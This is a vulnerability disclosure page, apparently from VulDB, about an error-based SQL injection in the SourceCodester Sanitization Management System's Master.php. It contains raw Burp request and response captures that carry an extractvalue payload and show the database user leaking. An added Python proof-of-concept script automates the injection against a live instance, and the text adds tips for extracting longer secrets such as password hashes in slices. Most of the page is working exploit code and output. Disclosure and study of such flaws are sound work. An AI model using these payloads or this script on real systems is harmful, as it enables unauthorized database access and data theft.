| Field | Value |
|---|---|
| Title | sourcecodester Sanitization-Management-System SQL injection |
| Description | A vulnerability classified as critical has been discovered in SMS. This affects an unknown part of the file Master.php. Manipulation of the parameter ID results in SQL injection. |

Submitter's notes:
#1, visit the CMS
#2, use Burp to capture the request
#3, I found that there is SQL injection in name="id" in the form submitted to the path /php-sms/classes/Master.php?f=save_quote
Request and response packets:
-----------------------------------------------------------------------------------------------------------
POST /php-sms/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="100"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sms/admin/?page=services/manage_service
Connection: keep-alive
Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj
Content-Length: 718

------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="id"


------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="name"

1'
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="description"

555
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="files"; filename="image.jpg"
Content-Type: image/jpeg

1
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="status"

0
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="img"; filename="zip.zip"
Content-Type: application/x-zip-compressed

1
------WebKitFormBoundarycKqminYBwcgy9RHs--
-----------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 09:11:32 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.4.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 349

<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br />
{"status":"failed","error":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and delete_flag = 0' at line 1"}
-------------------------------------------------------------------------------------
POST /php-sms/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="100"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sms/admin/?page=services/manage_service
Connection: keep-alive
Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj
Content-Length: 778

------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="id"


------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="name"

1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))); --
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="description"

555
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="files"; filename="image.jpg"
Content-Type: image/jpeg

1
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="status"

0
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="img"; filename="zip.zip"
Content-Type: application/x-zip-compressed

1
------WebKitFormBoundarycKqminYBwcgy9RHs--
------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 09:15:07 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.4.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 220

<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br />
{"status":"failed","error":"XPATH syntax error: '~root@localhost~'"}
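The two captures above show the whole error-based technique: the first quote in the `name` value breaks the quoted string of a query that ends in `and delete_flag = 0`, and the second payload makes MySQL raise an XPATH error whose message carries the result of `select user()` between two `~` delimiters, which the application then hands back verbatim inside its JSON `error` field. Note that the captured request submits the payload in the `name` field of `f=save_service`, whereas the title and VulDB entry refer to the `ID` parameter of `f=save_quote`; the example below follows the capture. It is an added example, not code from the VulDB entry or from the Sanitization Management System project. The base URL, the session cookie and the availability of the `requests` library are assumptions for a live run; the offline part works on the response body from the capture, embedded here as a constructed sample.

```python
"""
Added example (not from the VulDB entry or the project): reproduces the
error-based SQL injection captured above against a local instance and
parses the leaked value out of the JSON error the application returns.

Assumptions (not stated on the page): the target base URL, a valid admin
PHPSESSID, and that `requests` is installed. Endpoint, field names and the
payload shape are taken from the captured request.
"""
import json
import re
import sys

# MySQL reports the bad XPath expression back in the error text; the
# payload wraps the leaked value in '~' so it is easy to pick out.
LEAK_RE = re.compile(r"XPATH syntax error: '~(.*?)~?'")

# Response body from the second capture above (PHP notice followed by JSON),
# constructed here as an offline sample for parse_leak().
SAMPLE_RESPONSE = (
    "<br />\n<b>Notice</b>: Trying to get property 'num_rows' of non-object in "
    "<b>E:\\phpstudy_pro\\WWW\\php-sms\\classes\\Master.php</b> on line <b>48</b><br />\n"
    '{"status":"failed","error":"XPATH syntax error: \'~root@localhost~\'"}'
)


def build_payload(expr: str) -> str:
    # Close the quoted `name` value, force an XPATH error that embeds the
    # result of `expr`, and comment out the trailing "and delete_flag = 0".
    # 0x7e is '~'. Same construction as the captured payload.
    return f"1' and (extractvalue(1,concat(0x7e,({expr}),0x7e))); -- "


def parse_leak(body: str):
    # The PHP notice precedes the JSON, so locate the JSON object first.
    m = re.search(r"\{.*\}", body, re.S)
    if not m:
        return None
    try:
        err = json.loads(m.group(0)).get("error", "")
    except json.JSONDecodeError:
        return None
    leak = LEAK_RE.search(err)
    return leak.group(1) if leak else None


def form_fields(payload: str) -> dict:
    # Same multipart fields as the captured request; `files` and `img` are
    # sent as dummy uploads because the handler expects them.
    return {
        "id": (None, ""),
        "name": (None, payload),
        "description": (None, "555"),
        "status": (None, "0"),
        "files": ("image.jpg", b"1", "image/jpeg"),
        "img": ("zip.zip", b"1", "application/x-zip-compressed"),
    }


def extract(base_url: str, session_id: str, expr: str):
    # Live run only: POST the payload and return the leaked value, if any.
    import requests  # assumed available; not needed for the offline parser

    r = requests.post(
        f"{base_url}/php-sms/classes/Master.php",
        params={"f": "save_service"},
        files=form_fields(build_payload(expr)),
        cookies={"PHPSESSID": session_id},
        headers={"X-Requested-With": "XMLHttpRequest"},
        timeout=10,
    )
    return parse_leak(r.text)


if __name__ == "__main__":
    # usage: python poc.py http://localhost <PHPSESSID>   (assumed values)
    base, sid = sys.argv[1], sys.argv[2]
    for expr in ("select user()", "select version()", "select database()"):
        print(expr, "->", extract(base, sid, expr))
```

Two practical caveats. MySQL truncates the text of an XPATH error to 32 characters, so longer results (a password hash, for instance) have to be pulled in slices with `substring()` or `mid()`; the regex above tolerates a missing closing `~` for that reason. And the request needs an authenticated admin session (the capture carries a `PHPSESSID` and an admin `Referer`), so the finding is post-authentication. The fix on the application side is to stop interpolating `name` into the SQL string and bind it through a prepared statement, which also silences the `num_rows` notice that leaks the server path.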
| Field | Value |
|---|---|
| Source | ⚠️ https://github.com/x9AD8/Sanitization-Management-System/blob/main/README.md |
| User | uchihashow (UID 34954) |
| Submitted | 11/02/2022 10:30 AM (3 years ago) |
| Moderated | 11/05/2022 09:46 AM (3 days later) |
| Status | Accepted |
| VulDB Entry | 213012 [SourceCodester Sanitization Management System Master.php?f=save_quote ID SQL Injection] |
| Points | 20 |